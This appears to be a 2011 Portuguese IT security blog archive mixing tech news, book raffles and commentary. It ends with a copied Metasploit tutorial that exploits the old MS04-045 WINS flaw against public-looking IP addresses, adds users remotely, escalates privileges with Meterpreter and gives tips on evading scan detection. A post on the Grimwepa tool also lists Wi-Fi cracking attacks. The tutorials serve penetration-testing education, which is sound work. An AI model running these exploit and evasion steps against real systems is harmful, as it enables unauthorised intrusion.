sexta-feira, 27 de maio de 2011

WEB 2.0: A segurança vem evoluindo junto com o mercado.

Acompanho o mercado de segurança da informação há 10 anos, sempre estudando, analisando e testando uma série de vulnerabilidades e softwares. No início era complicado você encontrar boas ferramentas para execução de testes de segurança, isso devido a 2 motivos:
Não existência de boas ferramentas
Não tínhamos boas conexões de Internet para download
Era feito tudo na mão e muitos vezes de forma amadora.
Passado alguns anos, temos uma série de ferramentas como live CD, exploits e frameworks capazes de auxiliar qualquer um na arte de Hacker, seja para o bem ou para mal.
Porém nestes últimos 3 anos, graças ao crescimento na quantidade de sites, plataformas e ferramentas WEB, surgiram uma série de distribuições, softwares ou exploits voltados ao mundo WEB, seja para testar a vulnerabilidade de um código escrito em JAVA, PHP, HTML ou Perl, ou para executar uma tentativa de invasão por completo.
O termo Web Hacking é bem conhecido pelo mercado de segurança da informação que vem criando produtos e metodologias para assegurar suas aplicações, produtos e serviços voltados a Internet.
Além dá má codificação, falta de atualização de servidores WEB ou aplicacionais, tem o problema dos ataques DDOS onde muitas empresas e serviços não estão preparados para suporta-los, por causa de uma má arquitetura ou falta de investimento quanto a segurança.
Algumas empresas de segurança da informação como a WebSense, lançaram suítes voltadas ao mercado WEB 2.0 e de mídias digitais, tentando assegurar o que é escrito, editado e lido pelas empresas e seus funcionários via WEB, tudo para garantir a reputação e a integridade da informação.
Firewall, IDS, IPS, Proxy e controles de conteúdo WEB 2.0 são ferramentas essenciais para aqueles que desejam ter um pouco de controle da sua infraestrutura.

MagCover: coloque a sua foto na capa de uma revista!

online que permite que você coloque a sua foto em mais de 100 capas de revistas diferentes, de maneira muito simples e rápida. A sua, ou a de um amigo... ou até mesmo inimigo, dependendo da manchete que você escrever.

O sistema é realmente muito simples, e qualquer um consegue fazer uma revista com aspecto profissional, bastando enviar a foto e escolher o modelo. Todo o texto da capa pode ser alterado, para que você coloque o nome da vítima, ou uma manchete bem divertida e, quem sabe, uma piadinha interna...
http://ultradownloads.uol.com.br/download/MagCover/baixar-gratis.html
E as possibilidades de piadas são muitas, pois há revistas de carro, moda, culinária, fofoca... nenhuma revista tem o título real, mas com certeza dá para saber de onde veio a inspiração de cada uma.

Depois de pronto, você pode baixar o arquivo JOG para imprimir em casa ou pode enviar para o Facebook e outras mídias sociais para se divertir entre amigos sem gastar papel. Porém, para imprimir em alta qualidade, é preciso pagar pelo download da imagem.
http://ultradownloads.uol.com.br/download/MagCover/baixar-gratis.html

Apple assume vírus em Mac e promete atualização para eliminar malware

A Apple prometeu, nesta terça-feira (24/5), liberar, em breve, uma atualização do Mac OS X para eliminar o malware que carrega um falso programa de segurança, apelidado de Mac Defender, assim como suas variações (Mac Security, Mac Protector e Mac Guard).

Além do anúncio da atualização, a Apple também divulgou os passos adequados para que os usuários infectados se livrem do malware. “A atualização também ajudará a proteger os usuários, exibindo um aviso explícito se eles baixarem esse malware", dizia o comunicado.

Este tipo de malware, conhecido como "scareware" ou "rogueware", tentam convencer usuários a baixar programas maliciosos, prometendo ajudar na segurança do computador. O Mac Defender foi o primeiro malware direcionado para Macs e esta foi a primeira vez que a empresa reconheceu publicamente uma ameaça.

Falha de segurança no Internet Explorer permite roubo de senhas

Pesquisador de segurança encontrou falha que permite o chamado 'sequestro de cookies'
26 de Maio de 2011 | 19:50h
Compartilhe:

Um pesquisador da área de segurança afirmou à Reuters nesta quinta-feira (26/5) que uma falha no navegador Internet Explorer pode permitir o roubo de senhas de sites como Twitter e Facebook. "Qualquer site. Qualquer cookie. O limite está em sua imaginação", afirmou o pesquisador independente italiano Rosario Valotta. Ele definiu a falha como "sequestro de cookies".

De acordo com Valotta, os hackers poderiam obter acesso a arquivos armazenados pelo browser - os chamados "cookies" - através da falha. Entre os arquivos, poderiam estar os nomes de usuários e senhas para contas de sites da web.

A vulnerabilidade afeta todas as versões do navegador, incluindo o Internet Explorer 9, lançado recentemente pela Microsoft. Segundo Valotta, o hacker deve persuardir uma vítima a arrastar um objeto pela tela do computador para que o cookie seja sequestrado. Apesar de parecer uma tarefa difícil, o pesquisador afirmou ter conseguido 80 cookies em três dias aplicando a técnica no Facebook. "E só tenho 150 amigos na minha lista", disse.

A Microsoft, por outro lado, afirmou que não há grande risco de um hacker obter sucesso com a trama. "Para ser afetado, um usuário precisa visitar um site suspeito, ser convencido a arrastar ítens pela página e o atacante precisaria ter como alvo o coookie de um site ao qual o usuário estivesse conectado naquele momento", afirmou Jerry Bryant, porta-voz da companhia.

Caixa anuncia apostas na Mega-Sena pela internet para 2012

Divulgação
A Caixa Econômica Federal divulgou na última quinta-feira (26/5) a inclusão de um serviço aberto de apostas na Mega-Sena, via internet, até junho de 2012. Atualmente, só são permitidos apostadores correntistas do banco, maiores de 18 anos, através do Internet Banking.

O serviço restrito está disponível há um mês e, de acordo com informações da Caixa, tem apresentado resultado satisfatório.

O objetivo do investimento é incluir classes mais altas, que não possuem conta na CEF e o hábito de frequentar Casas Lotéricas. Estima-se que o número de apostadores seja dobrado após a implementação do sistema, que aguarda estudos de segurança online para que seja expandido para toda a população.

A Oracle vem demonstrando que veio para ficar.

A compra da Sun pela Oracle e a contratação do antigo presidente da HP mexeram em muito com o mercado, principalmente o de servidores, desenvolvimento e de sistemas operacionais.
Tudo indica que a Oracle, em pouquíssimo tempo, se tornará um gigante, não só em banco de dados, mas em todas as ramificações mais lucrativas do mercado de TI. Vejamos, ela comprou a BEA, que era líder na venda de servidores Aplicacionas. O velho e bom conhecido WebLogic é da Oracle agora, e de leva, ela levou a família Aqualogic e seus produtos voltados ao mundo SOA. Comprou a MySQL e por último a SUN, criadora do SUN Solaris e do JAVA.
Nestes últimas 3 anos, a Oracle vem anunciando uma série de novos produtos, todos eles focados para o mercado corporativo de alta demanda e performance e há poucos meses, foi anunciado a nova versão do seu sistema operacional – Oracle Solaris. Eu acredito que dentro em breve a Oracle vá dar um fim a sua linha Oracle Linux, meu palpite.o_O
Para completar, a Oracle anunciou nesta semana que não investiria mais no desenvolvimento de softwares para o processador Intel Itanium, decisão essa que era uma questão de tempo como dito por diversos analistas do mercado de TI. Só a HP apoia o projeto em todo o mundo, será que ele vai continuar ?
E o que nós, profissionais da área de TI, devemos esperar para os próximos 2 ou 3 anos ? Eu tenho os meus palpites, vamos a eles:
O Oracle Solaris vai voltar a reinar, como acontecia na década de noventa até 2003/2005, quando veio o Red Hat Advanced Server.
A Oracle lançará uma versão do JAVA+Jrockit, bem mais performática e com uma quantidade maior de monitores e gerenciadores de recursos, como do tipo: poder alocar em um ou mais processadores um processo JAVA, excelente para ambientes multiprocessados como os de hoje com máquinas com mais de 4 processadores físicos e 6-core ou 8-core.
WebLogic Application Server como os demais produtos voltados ao mundo JAVA terão recursos bem mais interessantes se utilizados na plataforma Oracle Solaris, incluindo o hardware proprietário da Oracle.
A Oracle irá as compras para aumentar a oferta de serviços. Sabemos que as margens de outsourcing são gigantescas, não é atoa que a IBM e HP, por exemplo, são as maiores empresas de TI do planeta.
Vamos esperar as cenas dos próximos capítulos, mas aconselho a todos o seguinte: Comecem a estudar os produtos da Oracle, pois haverá empregos bem remunerados.

Coruja de TI na Semana de Tecnologia da Fatec de São Caetano do SUL

Recebi um super convite da coordenação da Fatec de São Caetano do Sul para ministrar 3 palestras – Segurança em Cloud Computing, Técnicas de Virtualização e Infraestrutura de TI.
Vou aproveitar o momento e iniciar o projeto HackSP. Entrei em contato com as empresas parceiras DLTEC, 4linux, Clavis, Brasport e Novatec e elas forneceram os cursos e livros que serão sorteados entres os participantes das minhas 3 palestras:
8 bolsas para o curso à distância Cisco CCNA e mais 30% de desconto no mesmo curso (só para aqueles que não foram sorteados ), fornecidas pela DLTEC
3 bolsas do curso Linux Essentials que poderá ser feito presencialmente ou à distância, fornecidas pela 4linux
3 bolsas de segurança da informação, fornecidas pela Clavis. Uma bolsa de cada dos seguintes cursos à distância:
Auditoria de Segurança em Aplicações Web EAD
Fortalecimento de Servidores Unix/Linux EAD
Metasploit Framework EAD
A editora Novatec disponibilizou os seguintes livros para sorteio:
Segurança de Redes em Ambientes Cooperativos
Espionagem Empresarial
Gerenciamento de Pacotes de Software no Linux
Expressões Regulares – Uma abordagem divertida 3ª edição
A editora Brasport disponibilizou os seguintes livros para sorteio:
2 exemplares do Livro Mente Anti-hacker
2 exemplares do Livro Datacenter
2 exemplares do Livro Virtualização
2 exemplares do Livro Cloud Computing
A grade de palestras está disponível neste link e que eu saiba, o evento é de livre acesso. E não se esqueçam, só os participantes das palestras poderão participar dos sorteios – também irei sortear outros brindes.
Espero vê-los por lá.

AntiXSS V4.0 by Microsoft.

O Microsoft Anti-Cross Site Scripting Library V4.0 (V4.0 AntiXSS) é uma biblioteca de codificação projetada para ajudar desenvolvedores à protegerem as suas aplicações ASP.NET de ataques XSS.
Particularmente, eu achei a solução bem interessante já que o desenvolvimento ASP.NET sofre de sérios problemas com XSS, lembre-se do caso do site do Santos, do Corinthians e de tantos outros que baseiam os seus portais em tecnologia microsoft.
Você pode pegar mais detalhes e fazer download desta nova ferramenta no seguinte link.
A Microsoft, durante anos, foi tachada como a empresa que mais criava produtos vulneráveis à ataques e que fazia muito pouco para assegurá-los. Isso mudou, hoje, a Microsoft possui um time dedicado para análise de vulnerabilidades e gasta milhões de dólares com pesquisas, mas não quer dizer que ela não continue criando produtos vulneráveis e bugados, como é o caso do IE 9.
Alguns analistas dizem que o posto de empresa com produtos mais vulneráveis foi tomado pela Adobe.

Professional Penetration Testing – Um livro para quem quer saber como rola um Pentest

Professional Penetration Testing: Creating and Operating a Formal Hacking Lab é um daqueles livros que devem ser lidos por quem deseja trabalhar como pentest engineer. Ele aborda pontos importantes como definições dos diferentes tipos de hackers, as leis americanas contra o hackerismo, metodologias que são utilizadas para realização de testes de segurança, documentação e as técnicas.
É um livro de 2009, mas até hoje eu não encontrei nenhum outro que falasse tão bem sobre o assunto de pentest como este. Vejam que este livro não irá lhe ensinar toda a técnica utiliza por pentest engineer, ele lhe explicará quais são as melhores práticas para ser realizar um.
P.S.: tem muita empresa brasileira que realiza serviços de pentest que precisa comprar este livro, o quanto antes.

Mais um 0-day contra a Microsoft e mais uma dor de cabeça para os seus desenvolvedores.

A galera está ficando mais esperta ou os desenvolvedores estão ficando mais desleixados ? Essa foi a pergunta que eu fiz quando soube da nova vulnerabilidade 0-day que foi encontrada no hotmail, solução de email e de mensageira instantânea da Microsoft. O pessoal da Trend Micro foi rápida no gatilho e apresentou ao mercado a vulnerabilidade, os scripts e exploits que já estavam sendo utilizados por hackers/crackers.
Até o momento, eu não soube de nenhum patch ou solução que foi apresentada pela Microsoft para resolver o problema, o que eu soube foi que há novas variantes dos ataques que a Trend Micro encontrou e que dentro em breve teremos mais ferramentas para automatizar este ataque.
Convenhamos que mesmo que a Microsoft lance algum patch ou uma nova versão do hotmail/msn para ser implementada (caso essa seja a solução), isso vai levar um bom tempo e milhares de usuários ainda serão afetados.
Agora imagine como o pessoal dos tios Bill e Paul devem estar trabalhando neste momento para resolver o problema, e de quem é a culpa ? o_O

Super Wi-Fi vem ai, 800Mbps sem fio.

O Federal Communications Commission (FCC), órgão regulador da área de telecomunicações e radiodifusão dos EUA deu sinal verdade para as empresas, principalmente as de TI, explorarem os espaços em branco dos canais de televisão, com isso será possível a implementação de transmissão da dados sem fio com uma velocidade superior do que a tecnologia atual.
O super wi-fi utilizará as frequências que as empresas de televisão não utilizam, 54-698 MHz, a mesma tecnologia, praticamente, mas com uma velocidade muito maior. As empresas Google, Microsoft, Dell, HP, Intel, Philips, Samsung e Earthlink montaram um grupo para “auxiliar” o governo a definirem e liberarem a utilização destas frequências.
A Google e a Microsoft realizarem testes utilizando o super wi-fi e conseguirem a transferência de arquivos para grandes distância a uma velocidade média de 80 Mbps e para curtas distâncias velocidades entre 400-800Mbps, incrível.
Vários especialistas acreditam que em 2 ou 3 anos teremos acesso a antenas e roteadores wireless disponíveis no mercado, além é claro de computadores e diversos dispositivos preparados para utilizar essas incríveis velocidades.
E o que o super-wifi afeta na vida do pessoal que trabalha com TI ? Muita coisa, primeiro que o maior limitador na utilização de redes wi-fi em larga escala para grandes empresas é a velocidade de transmissão, velocidade essa que hoje é limitada em 54Mbps e dividida entre os vários usuários que utilizam a mesma antena para conectarem os seus computadores. Caso haja 10 computadores conectados via wi-fi, cada um terá o direito de usar 5.4 Mbps, caso não haja uma configuração de QOS no roteador Wireless.
Eu acredito que velocidades de 400-800 Mbps possibilitarão a configuração de redes wireless entre servidores para o provimento de alguns tipos de serviços que não sejam essenciais ao negócio, monitoração como exemplo.
Vejo a médio prazo o surgimento de equipamentos de segurança e de redes mais robustos e profissionais do que os atuais para o suporte de redes wi-fi de alta velocidade ou super wi-fi, nos resta aguardar.

Testando o Wi-Fi da Sua Casa: Grimwepa lhe ajudará.

Moro em um condomínio onde mais de 80% dos vizinhos possuem Internet de banda larga, sendo que a grande maioria faz o compartilhamento de suas conexões de rede em casa utilizando roteadores Wi-Fi.
Os meus vizinhos desconhecem as fraquezas do Wi-Fi, principalmente a criptografia WEPWired Equivalent Privacy (WEP), criptografia esta que é possível ser quebrada em alguns minutos com uma série de ferramentas disponíveis na Internet. Os mais espertinhos, que são muito poucos, utilizam a criptografia WPA Wi-Fi Protected Access (WPA), que é bem mais difícil de quebrar principalmente quando você utiliza frases extensas e com diferentes caracteres (Maiúsculas, numéricos e especiais).
Dai eu descobri Grimwepa que é uma aplicação Java que roda em plataforma Linux que auxilia quando o assunto é a quebra de senhas WEP e WAP. Ele foi criado especialmente para rodar na distribuição BackTrack, mas funciona em outras distribuições Linux, tudo isso para testar a minha conexão, nada de testar nos vizinhos em galera ;)
As principais funções dele são:
  • aircrack-ng suite:
  • o aircrack-ng, to crack WPA and WEP; o airodump-ng, to capture packets and find access points; o airmon-ng, to enumerate devices in monitor mode; o aireplay-ng, to forge and replay packets; o packetforge-ng, to create replay packets.
  • iwconfig, to see if devices are in monitor mode;
  • xterm, to show output to user;
  • ifconfig, to get the MAC address of devices;
  • macchanger, to change MAC address of wifi cards.
Uma foto do carinha funcionando:
Abaixo segue a lista dos diferentes tipos de ataques que ele sozinho consegue executar:
Attacks for WEP-encrypted Access Points:
* ARP-Replay attack
* Chop-chop attack
* Fragmentation attack
* p0841 attack
* Cafe-Latte attack
Cracking options:
o aircrack-ng is able to crack just about any WEP password after about 20,000 IV (Initialization Vector) data packets have been captured. The capture usually takes about 2 minutes, and the crack another 2-3 minutes.
Attacks for WPA-encrypted Access Points:
Basic de-authorization attack to get handshake.
Cracking:
o GRIM WEPA includes a 2MB default password list containing approximately 250,000 commonly-used passwords.
o Wordlist / Dictionary / Brute-force attack: Currently, there is only one consistent method of cracking WPA, and that is by brute force.
Para fazer o download dele é só acessar o link.
A execução dele é bem simples:
1
java -jar grimwepa_X.X.jar
Os dois vídeos abaixo demonstram passo a passo em como utilizar o Grimwepa:

BackTrack 5 chegará no dia 10 de Maio.

A nova versão do Back|Track, uma das maiores distribuições Linux voltadas à segurança da informação, estará disponível para download a partir do dia 10 de Maio. Muita gente acredita que esta nova versão terá algumas mudanças bem interessantes, além é claro, da atualização da quantidade de ferramentas para pentest inclusas nela.
Não há, até agora, uma distribuição Linux voltada à segurança que possa se comparada ao BackTrack devido a quantidade de ferramentas e funcionalidades que ela inclui.
Imagens e mais informações nos seguintes links – 1 – 2.

Sorteio do Livro Datacenter – Componente Central da Infraestrutura de TI

O Coruja de ti irá sortear dois livros Datacenter – Componente Central da Infraestrutura de TI autografados pelo Dr. Manoel Veras
O datacenter é o componente central e vital das operações de TI de todos as empresas, uma série de tecnologias e processos são importantes para que produtos e serviços sejam entregues aos clientes com a melhor performance, segurança e estabilidade. Mas todos aqueles que trabalham em datacenters sabem da quantidade de informações e tecnologias que precisamos estudar para atender estes requisitos aos nossos clientes.
Vejam o regulamento na continuação deste post
Para nos auxiliar nesta tarefa, o Dr. Manoel Veras escreveu na minha opinião, o melhor livro sobre datacenters nestes últimos anos, prático, didático e acima de tudo, atual. O livro contêm todas as informações para aqueles que trabalham ou que não trabalham diretamente com datacenter, mas desejam saber sobre uma série de tecnologias e detalhes que ali residem.
Como já dito, irei sortear dois livros, Datacenter – Componente Central da Infraestrutura de TI autografados pelo Dr. Manoel Veras e para participar é muito fácil, basta enviar um email para coruja@corujadeti.com.br com o seguinte subject:
Coruja de TI ajudando a galera a entender sobre Datacenters.
O corpo do email deverá conter o endereço de envio do livro.
O Sorteio será no próximo 23/10 às 20:00. Participem e divulguem aos amigos.
E haverá um sorteio extra, para todos aqueles que fizerem um rt(retweet) da promoção. O ganhador levará uma caneca do coruja de ti, brinde de desejo de 10 de cada 10 pessoas que acessam o blog. :)

Professional Penetration Testing – Um livro para quem quer saber como rola um Pentest

Professional Penetration Testing: Creating and Operating a Formal Hacking Lab é um daqueles livros que devem ser lidos por quem deseja trabalhar como pentest engineer. Ele aborda pontos importantes como definições dos diferentes tipos de hackers, as leis americanas contra o hackerismo, metodologias que são utilizadas para realização de testes de segurança, documentação e as técnicas.
É um livro de 2009, mas até hoje eu não encontrei nenhum outro que falasse tão bem sobre o assunto de pentest como este. Vejam que este livro não irá lhe ensinar toda a técnica utiliza por pentest engineer, ele lhe explicará quais são as melhores práticas para ser realizar um.
P.S.: tem muita empresa brasileira que realiza serviços de pentest que precisa comprar este livro, o quanto antes.

Querem acabar com o reinado da VMware.Que coisa...

As maiores empresas de tecnologia estão se juntando para montar um consórcio com o objetivo de criar um concorrente de peso para competir com as soluções de virtualização da VMware. Para quem não sabe, a VMware possui mais de 70% do mercado quando o assunto é virtualização. Eu particularmente conheço pouquíssimas empresas que utilizam uma outra solução de virtualização que não seja VMware.
VMware funciona, tem bastante material na internet para troubleshooting e ganhou a confiança de seus clientes. Mas acontece que os gigantes do outsourcing não gostam nem um pouco de ficar nas mãos de uma única empresa, daí a necessidade de se montar um consórcio para unir esforços na criação de uma outra solução. Acontece que há outras soluções ou produtos para virtualização no mercado e que são concorrentes diretos da VMware. Estou falando da Citrix, Microsoft e RedHat.
A única solução “opensource” entre os 3 citados é proveniente da RedHat, e ela vem demonstrando um crescimento quanto a adoção do seu Red Hat Enterprise Virtualization (RHEV) em diversos clientes, onde o RHEV é baseado no KVM (opensource). Neste momento, a RedHat possui cerca de 1% do mercado de produtos voltados à virtualização, parece piada, mas este número pode aumentar e muito se os gigantes de outsourcing começarem a adotar o produto VMware como base de seu portfólio.
Alguns detalhes importante que muita gente esquece por aí:
  • O carro chefe da VMware é o seu ESX, sistema operacional dedicado à virtualização que tem como base, até a sua última versão, o RedHat. O pessoal da VMware vai falar que não, mas os mais espertos poderão dar uma olhada em alguns arquivos e encontrar algumas alterações no Kernel.
  • O mercado está aguardando uma nova versão do ESX para este ano onde a VMware iria abandonar o RedHat e passaria a utilizar uma distribuição próprio do Linux ou do Ubuntu como base do seu carro chefe.
  • Os engenheiros e arquitetos da VMware vêm trabalhando arduamente para melhor a performance do I/O do ESX  já que esse é um dos maiores impeditivos para adoção deste software em alguns ambientes de produção, como é o caso dos bancos de dados.
Vamos esperar as cenas dos próximos capítulos.

Tutorial detalhado em guia prático do Metasploit – Copiado.

O tutorial abaixo é uma cópia exata do site portugual-a-programar e em minhão opinião é um dos melhores para língua portuguesa. O original poderá ser acessado no seguinte link. Nenhuma palavra ou vírgula foi alterada do original, restando somente o meu apoio e parabéns quanto ao excelente trabalho feito pelo herakty , autor deste excelente tutorial.
Vale lembrar que este tutorial está em português de Portugal.
O Metasploit é um framework criado por H.D.Moore, que serve para elaboração e execução de um repositório de exploits.
Os meus maiores agradecimentos ao H.D. Moore e sua equipe por tornarem um sonho realidade
Agora que todos já sabem o que é o Metasploit, vamos aprender a trabalhar com ele. Lembrando que este tutorial só tem o objectivo de aprendizagem, cada um é responsável pelos seus actos.
De qualquer forma, e devido a certos requesitos dos testes de intrusão deverão usar sempre proxy a não ser que usem um Lab com VM´s
Uma das coisas que hoje já existe no metasploit é uma interface gráfica via browser que simplifica o processo, apesar de aconselhar a usarem o cliente tipo linha de comandos (msfcl)
A interface gráfica é o msfweb – Interface gráfica via browser
Vou usar o linux mas há também a versão para windows. Então levando em consideração que tenham instalado no vosso PC e está a funcionar, vamos dar uma vista sobre a utilização desta SUPER PODEROSA FERRAMENTA… um sonho tornado realidade… para mim que ainda me lembro quando para fazer isto era preciso dezenas de tools e procedimentos… agora tá tudo integrado numa plataforma/framework.
Vou também ter o cuidado de usar vulnerabilidades antigas e exploits ultrapassados para que não possa ser usado como guia total para um ataque, visto cobrir todo o percurso de exploitation. Mas basta seleccionar outros exploits para as novas coisinhas… ;)
Vejam também a, digamos,  o irmão web que é a excelente w3af “Web Application Attack  and Audit Framework.”
Apesar do metasploit também estar preparado para ataques web, mas eu especializei-me nos dois e é melhor trabalhar com as duas em conjunto.
O metasploit possui várias ferramentas dentre elas: (e muitas mais para vocês explorarem… explorem os payloads, os exploits e todos os outros utilitários. Podem fazer-lo lendo ou explorando nos ficheiros ou com comandos do tipo “show payloads” ou “show exploits”, entre outros.)
msfconsole – metasploit em modo console
msfcli - interface de automatização de penetração e exploração
msflogdump – exibe sessões de arquivos de log
msfplayload - usado para gerar payloads customizados
msfpescan – utilizado para analisar e descompilar executáveis e DLLs
msfencode – um codificador interactivo de payload encoder
msfupdate – utilizado para verificar e fazer download de actualização do framework
msfweb – Interface gráfica via browser
Hoje devido ao facto do metasploit estar na Rapid7 podem usar uma versão gratuita do detector de vulnerabilidades automático, o NeXpose Community Edition… ele detecta as vulnerabilidades e integra-se com o metasploit.
Nexpose  (Detector de vulnerabilidades)
http://www.rapid7.com/vulnerability-scanner.jsp
Podem, como eu, usar o Nessus para isso ou outras ferramentas… hoje até o nmap têm scripts para detectar vulnerabilidades, que são a principal questão no exploitation… é a partir de uma vulnerabilidade que tudo acontece e precisam saber a versão exacta do software alvo e do SO… em alguns casos no windows até a língua em que o windows esta.
Algo essencial para se escolher o exploit certo é saber o serviço e a versão exacta do mesmo, pois os exploits são feitos nessa base. Para tal e se soubermos já que há uma vulnerabilidade para um apache 2 versão anterior à 2.15, podemos fazer um scan especifico com o Nmap a essa porta (80) para não dar nas vistas. É como se alguem tivesse a aceder ao site, pois apenas são enviados pacotes para a porta 80. Se fizerem um scan a todas as portas e houver algum equipamento de jeito no caminho vai detectar que é um scan e corta. Saibam o que procurar e não façam scans a todas as portas, a não ser que não haja qualquer equipamento especial, como acontece na maioria dos datacenters para as contas mais baixas. As mais usadas  :cheesygrin: :thumbsup:
.
Nmap –sT –P0 –A –version-all –T0 –p 80 ipalvo (o –T0 é para que haja maior espaço de tempo entre o envio de pacotes, para dificultar a detecção. Mas não é uma técnica de evasão e pode ser dispensado. O Nmap têm diversas técnicas de evasão, como spoofing, etc… explorem a documentação)
Nessus (Detector de vulnerabilidades)
http://www.nessus.org/nessus/
O Nessus é um motor que interpreta scripts em NASL (ver artigo meu na 3ª Edição – Julho de 2006 que explica melhor esta linguagem) e envia-os contra um ou mais alvos, fazendo um relatório dos resultados. Estes scripts procurar milhares de vulnerabilidades, mas apensa as conhecidas. Podem desenvolver os vossos próprios scripts NASL para coisas novas.
Voltando ao Metasploit, eu vou ensinar aqui a utilizar somente três destas ferramentas(msfconsole, msfcli, msfweb), pois acredito que um verdadeiro  :smoke: aprenderá sozinho o restante… como sempre dou a base para futuras explorações. Ajuda ao ensino e evita script kiddies
msfconsole:
Primeiramente digita-se na linha de comando :
[root]#./msfconsole
se for no windows só digite msfconsole sem ./, continuando deverá aparecer algo como: (neste caso já foi usado o comando “show exploits” para se ter uma lista dos exploits. O comando show serve para outras coisas como payloads e opções. Ver em detalhe)
Para quem dá o primeiro passo pode executar o comando “help” para ver os comandos de consola. Atenção que isto são apenas os comandos de consola e não todas as suas funcionalidades.

Como vimos na primeira imagem do mestasploit e a nivel formativo, pois no mundo a sério já saberão que exploit usar, será: show [opção]  (a opção poderá ser uma das que vos aparecerão senão digitarem nenhuma, como podem ver no exemplo em seguida
desta forma:

msf > show
msfconsole: show: requires an option: 'exploits', 'payloads', 'encoders', or 'nops'
msf >

Viram que apareceram as opções deste comando. O mesmo acontece com outros comandos, pois podem ir assim explorando a framework.
Para saberem quais os exploits que existem nesta framework (desde a ultima actualização, devem ir actualizando o metasploit que está em constante evolução) basta digitar o comando:
msf >show exploits; 
Para saber os payloads que existem neste framework basta digitar o comando: show payloads e assim por diante.
Então dentro do ambiente do metasploit escolhemos o exploit assim com o comando “use”:
msf > use wins_ms04_045
msf wins_ms04_045 >

viram que eu escolhi o wins_ms04_045 e o prompt mudou . Utilizando para isto o comando: use
continuando…
Digitamos o nosso velho amigo : show , novamente para verificar quais atributos ele aceita . Vejamos:
msf wins_ms04_045 > show
msfconsole: show: specify 'targets', 'payloads', 'options', or 'advanced'
msf wins_ms04_045 >

Vimos aqui que ele aceita targets, payloads, options ou advanced.
Vamos verificar quais opções que este exploit já seleccionado aceita:
msf wins_ms04_045 > show options
Exploit Options
===============
Exploit: Name Default Description
-------- ------ ------- ------------------
required RHOST The target address
required RPORT 42 The target port
Target: Target Not Specified

msf wins_ms04_045 >
Este exploit aceita somente duas opções : o ip alvo e a porta alvo. 
Agora deves estar a perguntar… como faço para utilizar isto. Simples, basta configurar o que o exploit aceita (há diferenças entre exploits e cada vez mais, pois mais complexidade e vectores são adicionados, diferenciando cada vez mais os exploits), lembrando que onde estiver escrito required,  significa que estas opções tem que ser configuradas obrigatoriamente para o exploit funcionar. Continuando…
Façamos assim:
msf wins_ms04_045 > set RHOST 200.126.35.34
RHOST -> 200.126.35.34
msf wins_ms04_04>
msf wins_ms04_045 > set RPORT 42
RPORT -> 42
msf wins_ms04_045 >

Vejam que utilizei a mesma porta que o valor por default…
Agora teremos que seleccionar o payload para o nosso exploit. O payload nada mais é que um software acoplado ao exploit para fazer as mais variadas tarefas.
Digitamos então o comando para saber os payloads suportados pelo nosso exploit: show payloads
msf wins_ms04_045 > show payloads
Metasploit Framework Usable Payloads
====================================
win32_adduser Windows Execute net user /ADD
win32_bind Windows Bind Shell
win32_bind_dllinject Windows Bind DLL Inject
win32_bind_meterpreter Windows Bind Meterpreter DLL Inject
win32_bind_stg Windows Staged Bind Shell
win32_bind_stg_upexec Windows Staged Bind Upload/Execute
win32_bind_vncinject Windows Bind VNC Server DLL Inject
win32_exec Windows Execute Command
win32_passivex Windows PassiveX ActiveX Injection Payload
win32_passivex_meterpreter Windows PassiveX ActiveX Inject Meterpreter Payload
win32_passivex_stg Windows Staged PassiveX Shell
win32_passivex_vncinject Windows PassiveX ActiveX Inject VNC Server Payload
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
win32_reverse_ord Windows Staged Reverse Ordinal Shell
win32_reverse_ord_vncinject Windows Reverse Ordinal VNC Server Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server Inject

msf wins_ms04_045 >
Eu vou escolher o primeiro payload, que faz com que seja adicionado remotamente um utilizador no sistema windows (como tenho dito tanto sobre os payloads, hoje já há payloads para tudo e todos os SO´s… até uma shell especial para cracking que é o meterpreter)  :cheesygrin: :thumbsup:
O meterpreter é um complexo payload que é uma espécia de shell especial para cracking, com funcionalidades especificas para isso. Algo que já falei bastante também.
Documento onde é detalhado técnicamente o meterpreter:
http://www.nologin.org/Downloads/Papers/meterpreter.pdf
Caso queiram usar o meterpreter, na selecção do payload, escolham um com meterpreter, como por exemplo win32_reverse_meterpreter… isto vai criar uma sessão no alvo, com o meterpreter e como é reverse passa pelas firewalls, pois estas pensam que como vem de dentro da rede é confiável.
Assim:
msf wins_ms04_045 > set PAYLOAD win32_adduser jolie
PAYLOAD win32_adduser -> jolie
msf wins_ms04_045>

Vamos agora listar os sistemas operativos que serão os alvos: Utilizando o velho comando : show, só que agora assim: show targets
msf wins_ms04_045 > show targets
Supported Exploit Targets
=========================
0 Windows 2000 English
msf wins_ms04_045 >
Só temos uma opcao aqui, somente o windows 2000 em ingles é vulneravel, mas tudo bem...

msf wins_ms04_045 > set TARGET 0
TARGET -> 0
msf wins_ms04_045 >

tamos mesmo, mesmo, mesmo a um tirinho de caçadeira… valeu a pena chegar aqui… pois agora apenas falta uma coisa para completar nossa tarefa… Executar o nosso exploit, que é mais um pacote exploit (conjunto de várias coisas que antigamente se faziam em separado e com muito trabalho) do que somente um exploit.
Digite somente: exploit (lindo não? Isto é “disparar” o exploit em direcção ao alvo. ATENÇÃO. Só usar alvos virutais ou máquinas voças
msf wins_ms04_045 > exploit
E pronto…Acabamos a nossa primeira etapa, agora vamos passar para o msfcli.
O msfcli é utilizado para poder fazer tudo de uma só vez. Nao precisando do passo a passo descrito acima. Se nós ja conhecemos o exploit isto agiliza
muito o nosso trabalho na linha de comando digitamos assim:
[root]#./msfcli wins_ms04_045 RHOST =200.156.23.25 RPORT=42 PAYLOAD=win32_adduser teste TARGET=0 E
e vejam que faz a mesma coisa que no modo console.
Caso o exploit se direcione a um serviço sem previlégios especiais pode-se usar um exploit local para escalar previlégios ou os seguintes comandos do meterpreter. Atenção que neste caso terão de estar a usar o meterpreter (para isso terão na altura de selecção do payload escolher um especial com o meterpreter, como por exemplo win32_reverse_meterpreter)
E na sessão do meterpreter usem os scripts já existentes para isso, como apresento em baixo.
meterpreter> use priv
meterpreter> getsystem

Mais coisas interessantes que se podem fazer com o meterpreter em conjunto com outras ferrametas geniáis, como o LophtCrack ou o Cain e Abel para crackar hashes de passwords.
Has passwords estão codificadas mas podem ser “sacadas” e posteriormente crackadas… garanto que conseguirão algumas que não sejam muito fortes, o que é muito normal.
